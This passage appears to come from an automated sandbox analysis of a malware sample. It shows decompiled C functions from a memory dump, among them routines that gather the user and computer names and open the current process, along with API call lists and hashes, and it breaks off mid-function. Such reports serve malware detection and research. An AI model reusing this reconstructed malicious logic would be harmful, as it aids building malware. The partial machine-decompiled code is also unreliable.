                                                                                                                                                                                              0x00dfa833
                                                                                                                                                                                              0x00dfa803
                                                                                                                                                                                              0x00dfa810
                                                                                                                                                                                              0x00dfa813
                                                                                                                                                                                              0x00dfa823
                                                                                                                                                                                              0x00dfa826
                                                                                                                                                                                              0x00dfa82c
                                                                                                                                                                                              0x00dfa82c
                                                                                                                                                                                              0x00dfa7be
                                                                                                                                                                                              0x00dfa7cb
                                                                                                                                                                                              0x00dfa7ce
                                                                                                                                                                                              0x00dfa7e0
                                                                                                                                                                                              0x00dfa7e3
                                                                                                                                                                                              0x00dfa7e3
                                                                                                                                                                                              0x00dfa83d
                                                                                                                                                                                              0x00dfa849
                                                                                                                                                                                              0x00dfa83f
                                                                                                                                                                                              0x00dfa842
                                                                                                                                                                                              0x00dfa842
                                                                                                                                                                                              0x00dfa83d
                                                                                                                                                                                              0x00dfa7b4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa77b
                                                                                                                                                                                              0x00dfa723
                                                                                                                                                                                              0x00dfa72d
                                                                                                                                                                                              0x00dfa72f
                                                                                                                                                                                              0x00dfa734
                                                                                                                                                                                              0x00dfa738
                                                                                                                                                                                              0x00dfa73a
                                                                                                                                                                                              0x00dfa745
                                                                                                                                                                                              0x00dfa748
                                                                                                                                                                                              0x00dfa748
                                                                                                                                                                                              0x00dfa74e
                                                                                                                                                                                              0x00dfa753
                                                                                                                                                                                              0x00dfa753
                                                                                                                                                                                              0x00dfa759
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa759
                                                                                                                                                                                              0x00dfa65c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa683
                                                                                                                                                                                              0x00dfa68e
                                                                                                                                                                                              0x00dfa6a4
                                                                                                                                                                                              0x00dfa6aa
                                                                                                                                                                                              0x00dfa6b2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa6b2

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • StrChrA.SHLWAPI(00DF553C,0000005F,00000000,00000000,00000104), ref: 00DFA675
                                                                                                                                                                                              • memcpy.NTDLL(?,00DF553C,?), ref: 00DFA68E
                                                                                                                                                                                              • lstrcpy.KERNEL32(?), ref: 00DFA6A4
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: lstrlen.KERNEL32(?,00000000,00DFD330,00000001,00DF937A,00DFD00C,00DFD00C,00000000,00000005,00000000,00000000,?,?,?,00DF207E,?), ref: 00DFA5F2
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: mbstowcs.NTDLL ref: 00DFA619
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: memset.NTDLL ref: 00DFA62B
                                                                                                                                                                                                • Part of subcall function 00DF1BC1: lstrlenW.KERNEL32(00DF553C,?,?,00DFA818,3D00DFC0,80000002,00DF553C,00DF9642,74666F53,4D4C4B48,00DF9642,?,3D00DFC0,80000002,00DF553C,?), ref: 00DF1BE1
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 00DFA6C6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                              • API String ID: 2598994505-2967466578
                                                                                                                                                                                              • Opcode ID: d46dfa51365751f3c57578d3aa4c05033286fd093b9352845011593e65ec1ccb
                                                                                                                                                                                              • Instruction ID: 120b38519ace3d1c2670adb95d0a9cf6d01d1933133139a3cf7c4757113c36f9
                                                                                                                                                                                              • Opcode Fuzzy Hash: d46dfa51365751f3c57578d3aa4c05033286fd093b9352845011593e65ec1ccb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 475149B650020EEFDF11AFA4DD41DBA7BBAEB04340F06C514BB1996221E736D915DB32
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF614A() {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				int _v16;
                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                              				long _t43;
                                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                                              				short _t51;
                                                                                                                                                                                              				signed int _t52;
                                                                                                                                                                                              				int _t56;
                                                                                                                                                                                              				int _t57;
                                                                                                                                                                                              				char* _t64;
                                                                                                                                                                                              				short* _t67;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				GetUserNameW(0,  &_v8);
                                                                                                                                                                                              				_t39 = _v8;
                                                                                                                                                                                              				if(_t39 != 0) {
                                                                                                                                                                                              					_v12 = _t39;
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                              					_t43 = _v8;
                                                                                                                                                                                              					if(_t43 != 0) {
                                                                                                                                                                                              						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                              						_t64 = E00DF58BE(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                              						if(_t64 != 0) {
                                                                                                                                                                                              							_t47 = _v12;
                                                                                                                                                                                              							_t67 = _t64 + _t47 * 2;
                                                                                                                                                                                              							_v8 = _t47;
                                                                                                                                                                                              							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                                                                              								L7:
                                                                                                                                                                                              								E00DF147E(_t64);
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t51 = 0x40;
                                                                                                                                                                                              								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                                                                              								_t52 = _v8;
                                                                                                                                                                                              								_v12 = _v12 - _t52;
                                                                                                                                                                                              								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                                                                              									goto L7;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t56 = _v12 + _v8;
                                                                                                                                                                                              									_t31 = _t56 + 2; // 0xdf5210
                                                                                                                                                                                              									_v12 = _t56;
                                                                                                                                                                                              									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                                                                              									_v8 = _t57;
                                                                                                                                                                                              									if(_t57 == 0) {
                                                                                                                                                                                              										goto L7;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t64[_t57] = 0;
                                                                                                                                                                                              										_v16 = _t64;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v16;
                                                                                                                                                                                              			}















                                                                                                                                                                                              0x00df6158
                                                                                                                                                                                              0x00df615b
                                                                                                                                                                                              0x00df615e
                                                                                                                                                                                              0x00df6164
                                                                                                                                                                                              0x00df6169
                                                                                                                                                                                              0x00df616f
                                                                                                                                                                                              0x00df6177
                                                                                                                                                                                              0x00df617a
                                                                                                                                                                                              0x00df6180
                                                                                                                                                                                              0x00df6185
                                                                                                                                                                                              0x00df6192
                                                                                                                                                                                              0x00df619f
                                                                                                                                                                                              0x00df61a3
                                                                                                                                                                                              0x00df61a5
                                                                                                                                                                                              0x00df61a9
                                                                                                                                                                                              0x00df61ac
                                                                                                                                                                                              0x00df61bc
                                                                                                                                                                                              0x00df620f
                                                                                                                                                                                              0x00df6210
                                                                                                                                                                                              0x00df61be
                                                                                                                                                                                              0x00df61c3
                                                                                                                                                                                              0x00df61c4
                                                                                                                                                                                              0x00df61c9
                                                                                                                                                                                              0x00df61cc
                                                                                                                                                                                              0x00df61df
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df61e1
                                                                                                                                                                                              0x00df61e4
                                                                                                                                                                                              0x00df61e9
                                                                                                                                                                                              0x00df61f7
                                                                                                                                                                                              0x00df61fa
                                                                                                                                                                                              0x00df6200
                                                                                                                                                                                              0x00df6205
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6207
                                                                                                                                                                                              0x00df6207
                                                                                                                                                                                              0x00df620a
                                                                                                                                                                                              0x00df620a
                                                                                                                                                                                              0x00df6205
                                                                                                                                                                                              0x00df61df
                                                                                                                                                                                              0x00df6215
                                                                                                                                                                                              0x00df6216
                                                                                                                                                                                              0x00df6185
                                                                                                                                                                                              0x00df621c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00DF520E), ref: 00DF615E
                                                                                                                                                                                              • GetComputerNameW.KERNEL32(00000000,00DF520E), ref: 00DF617A
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00DF520E), ref: 00DF61B4
                                                                                                                                                                                              • GetComputerNameW.KERNEL32(00DF520E,?), ref: 00DF61D7
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00DF520E,00000000,00DF5210,00000000,00000000,?,?,00DF520E), ref: 00DF61FA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3850880919-0
                                                                                                                                                                                              • Opcode ID: 63cb7002d7d845fa49b326560517276c4e37ad4f240d5caed414f075cbdb6257
                                                                                                                                                                                              • Instruction ID: a556b43814e6694e57a73c515076bed840f0728db7617d48a53cc26a3f19b505
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63cb7002d7d845fa49b326560517276c4e37ad4f240d5caed414f075cbdb6257
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8721D8B690020CFFDB11DFE4D9859BEBBB9EF44304B1584AAE605E7201EA309B45DB64
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E00DF62CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                                                                                                                                                                              				char _v5;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _t28;
                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                              				char* _t42;
                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				void* _t50;
                                                                                                                                                                                              				int _t51;
                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                              				void* _t55;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t49 = _a4;
                                                                                                                                                                                              				_t55 = __eax;
                                                                                                                                                                                              				_v12 = 0xb;
                                                                                                                                                                                              				if(_t49 != 0 && __eax != 0) {
                                                                                                                                                                                              					_t5 = _t55 - 1; // -1
                                                                                                                                                                                              					_t42 = _t49 + _t5;
                                                                                                                                                                                              					_t28 =  *_t42;
                                                                                                                                                                                              					_v5 = _t28;
                                                                                                                                                                                              					 *_t42 = 0;
                                                                                                                                                                                              					__imp__(_a8, _t41);
                                                                                                                                                                                              					_v16 = _t28;
                                                                                                                                                                                              					_t50 =  *0xdfd114(_t49, _a8);
                                                                                                                                                                                              					if(_t50 != 0) {
                                                                                                                                                                                              						 *_t42 = _v5;
                                                                                                                                                                                              						_t44 = RtlAllocateHeap( *0xdfd238, 0, _a16 + __eax);
                                                                                                                                                                                              						if(_t44 == 0) {
                                                                                                                                                                                              							_v12 = 8;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t51 = _t50 - _a4;
                                                                                                                                                                                              							memcpy(_t44, _a4, _t51);
                                                                                                                                                                                              							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                                                                                                                                                                              							_t45 = _v16;
                                                                                                                                                                                              							_t54 = _a16;
                                                                                                                                                                                              							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                                                                                                                                                                              							 *_a20 = _t44;
                                                                                                                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              							 *_a24 = _t55 - _v16 + _t54;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v12;
                                                                                                                                                                                              			}
















                                                                                                                                                                                              0x00df62d5
                                                                                                                                                                                              0x00df62d8
                                                                                                                                                                                              0x00df62da
                                                                                                                                                                                              0x00df62e3
                                                                                                                                                                                              0x00df62f5
                                                                                                                                                                                              0x00df62f5
                                                                                                                                                                                              0x00df62f9
                                                                                                                                                                                              0x00df62fb
                                                                                                                                                                                              0x00df62fe
                                                                                                                                                                                              0x00df6301
                                                                                                                                                                                              0x00df630a
                                                                                                                                                                                              0x00df6314
                                                                                                                                                                                              0x00df6318
                                                                                                                                                                                              0x00df631d
                                                                                                                                                                                              0x00df6333
                                                                                                                                                                                              0x00df6337
                                                                                                                                                                                              0x00df6388
                                                                                                                                                                                              0x00df6339
                                                                                                                                                                                              0x00df6339
                                                                                                                                                                                              0x00df6341
                                                                                                                                                                                              0x00df6350
                                                                                                                                                                                              0x00df6355
                                                                                                                                                                                              0x00df6365
                                                                                                                                                                                              0x00df636b
                                                                                                                                                                                              0x00df6376
                                                                                                                                                                                              0x00df6380
                                                                                                                                                                                              0x00df6384
                                                                                                                                                                                              0x00df6384
                                                                                                                                                                                              0x00df6337
                                                                                                                                                                                              0x00df638f
                                                                                                                                                                                              0x00df6396

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00DF6301
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DF632D
                                                                                                                                                                                              • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00DF6341
                                                                                                                                                                                              • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00DF6350
                                                                                                                                                                                              • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00DF636B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1819133394-0
                                                                                                                                                                                              • Opcode ID: f3aa3c2953989be4796063bc8f8a9d42162e6c2e147a5ac76702d4e352dcada5
                                                                                                                                                                                              • Instruction ID: 34e58cdcc630476e250ce7082a26c26be2c0b4ac3fc4c761a868cd9cdbcd9ff7
                                                                                                                                                                                              • Opcode Fuzzy Hash: f3aa3c2953989be4796063bc8f8a9d42162e6c2e147a5ac76702d4e352dcada5
                                                                                                                                                                                              • Instruction Fuzzy Hash: D5217F7690020DAFCB019FA8C845AAEBFBAEF85304F098058F944AB315C775E915CBB0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E00DF9FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				long _t10;
                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t9 = __eax;
                                                                                                                                                                                              				_t22 = __eax;
                                                                                                                                                                                              				if(_a4 != 0 && E00DF6B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                                                                              					L9:
                                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t10 = E00DFA96C(_t9, _t18, _t22, _a8);
                                                                                                                                                                                              				if(_t10 == 0) {
                                                                                                                                                                                              					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                              					ResetEvent( *(_t22 + 0x20));
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0xffffffff);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                                                                                                                                                              					if( *0xdfd12c() != 0) {
                                                                                                                                                                                              						SetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t10 = GetLastError();
                                                                                                                                                                                              						if(_t10 == 0x3e5) {
                                                                                                                                                                                              							L7:
                                                                                                                                                                                              							_t10 = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t10 == 0xffffffff) {
                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                              			}







                                                                                                                                                                                              0x00df9fe7
                                                                                                                                                                                              0x00df9ff4
                                                                                                                                                                                              0x00df9ff6
                                                                                                                                                                                              0x00dfa059
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa059
                                                                                                                                                                                              0x00dfa00e
                                                                                                                                                                                              0x00dfa015
                                                                                                                                                                                              0x00dfa021
                                                                                                                                                                                              0x00dfa026
                                                                                                                                                                                              0x00dfa028
                                                                                                                                                                                              0x00dfa02a
                                                                                                                                                                                              0x00dfa02c
                                                                                                                                                                                              0x00dfa02e
                                                                                                                                                                                              0x00dfa030
                                                                                                                                                                                              0x00dfa03c
                                                                                                                                                                                              0x00dfa04c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa03e
                                                                                                                                                                                              0x00dfa03e
                                                                                                                                                                                              0x00dfa045
                                                                                                                                                                                              0x00dfa052
                                                                                                                                                                                              0x00dfa052
                                                                                                                                                                                              0x00dfa052
                                                                                                                                                                                              0x00dfa045
                                                                                                                                                                                              0x00dfa03c
                                                                                                                                                                                              0x00dfa057
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa05d

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00DF66AF,?,?,00000000,00000000), ref: 00DFA021
                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00DFA026
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DFA03E
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000102,00DF66AF,?,?,00000000,00000000), ref: 00DFA059
                                                                                                                                                                                                • Part of subcall function 00DF6B6E: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00DFA006,?,?,?,?,00000102,00DF66AF,?,?,00000000), ref: 00DF6B7A
                                                                                                                                                                                                • Part of subcall function 00DF6B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00DFA006,?,?,?,?,00000102,00DF66AF,?), ref: 00DF6BD8
                                                                                                                                                                                                • Part of subcall function 00DF6B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 00DF6BE8
                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00DFA04C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1449191863-0
                                                                                                                                                                                              • Opcode ID: 1df82756e6a198c79722b06f4f67ac5bce5003df40d3b64ebf3a948f1421f5b5
                                                                                                                                                                                              • Instruction ID: 8c55c9ebafb10430103fce6f4b272535e61b420674601575d9073d87077b5903
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1df82756e6a198c79722b06f4f67ac5bce5003df40d3b64ebf3a948f1421f5b5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 79018B71100309AEDA306B28ED44F7BB6A9EF44360F26CA24F759D11E4DB21E819DA72
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF6A7F(intOrPtr _a4) {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              				unsigned int _t4;
                                                                                                                                                                                              				void* _t5;
                                                                                                                                                                                              				long _t6;
                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                              				 *0xdfd26c = _t2;
                                                                                                                                                                                              				if(_t2 == 0) {
                                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t4 = GetVersion();
                                                                                                                                                                                              				if(_t4 != 5) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					if(_t15 <= 0) {
                                                                                                                                                                                              						_t5 = 0x32;
                                                                                                                                                                                              						return _t5;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					 *0xdfd25c = _t4;
                                                                                                                                                                                              					_t6 = GetCurrentProcessId();
                                                                                                                                                                                              					 *0xdfd258 = _t6;
                                                                                                                                                                                              					 *0xdfd264 = _a4;
                                                                                                                                                                                              					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                              					 *0xdfd254 = _t7;
                                                                                                                                                                                              					if(_t7 == 0) {
                                                                                                                                                                                              						 *0xdfd254 =  *0xdfd254 | 0xffffffff;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t4 >> 8 > 0) {
                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t15 = _t4 - _t4;
                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                              			}









                                                                                                                                                                                              0x00df6a87
                                                                                                                                                                                              0x00df6a8d
                                                                                                                                                                                              0x00df6a94
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6aee
                                                                                                                                                                                              0x00df6a96
                                                                                                                                                                                              0x00df6a9e
                                                                                                                                                                                              0x00df6aab
                                                                                                                                                                                              0x00df6aab
                                                                                                                                                                                              0x00df6aeb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6aeb
                                                                                                                                                                                              0x00df6aad
                                                                                                                                                                                              0x00df6aad
                                                                                                                                                                                              0x00df6ab2
                                                                                                                                                                                              0x00df6ac4
                                                                                                                                                                                              0x00df6ac9
                                                                                                                                                                                              0x00df6acf
                                                                                                                                                                                              0x00df6ad5
                                                                                                                                                                                              0x00df6adc
                                                                                                                                                                                              0x00df6ade
                                                                                                                                                                                              0x00df6ade
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6ae5
                                                                                                                                                                                              0x00df6aa7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6aa9
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00DF90D2,?), ref: 00DF6A87
                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00DF6A96
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00DF6AB2
                                                                                                                                                                                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00DF6ACF
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DF6AEE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2270775618-0
                                                                                                                                                                                              • Opcode ID: 7a033b0ef187f4080b29b17eb321b9cb246505aa4e1bc84bafcafde8aa60324c
                                                                                                                                                                                              • Instruction ID: bca11bc68f323c845615aa6995fc7f4ea08af6b881d63ea6be9693ce7af0d67b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a033b0ef187f4080b29b17eb321b9cb246505aa4e1bc84bafcafde8aa60324c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F0C27065030AEBD7209F75AD19B353B63E744705F11C51AE642E63E0DBB0C452CB39
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00DF91B5(intOrPtr* __eax) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				WCHAR* _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				short _v48;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				short _v64;
                                                                                                                                                                                              				intOrPtr* _t54;
                                                                                                                                                                                              				intOrPtr* _t56;
                                                                                                                                                                                              				intOrPtr _t57;
                                                                                                                                                                                              				intOrPtr* _t58;
                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                              				void* _t61;
                                                                                                                                                                                              				intOrPtr* _t63;
                                                                                                                                                                                              				intOrPtr* _t65;
                                                                                                                                                                                              				short _t67;
                                                                                                                                                                                              				intOrPtr* _t68;
                                                                                                                                                                                              				intOrPtr* _t70;
                                                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                                                              				intOrPtr* _t75;
                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				intOrPtr* _t83;
                                                                                                                                                                                              				intOrPtr* _t87;
                                                                                                                                                                                              				intOrPtr _t103;
                                                                                                                                                                                              				intOrPtr _t109;
                                                                                                                                                                                              				void* _t118;
                                                                                                                                                                                              				void* _t122;
                                                                                                                                                                                              				void* _t123;
                                                                                                                                                                                              				intOrPtr _t130;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t123 = _t122 - 0x3c;
                                                                                                                                                                                              				_push( &_v8);
                                                                                                                                                                                              				_push(__eax);
                                                                                                                                                                                              				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                              				if(_t118 >= 0) {
                                                                                                                                                                                              					_t54 = _v8;
                                                                                                                                                                                              					_t103 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t5 = _t103 + 0xdfe038; // 0x3050f485
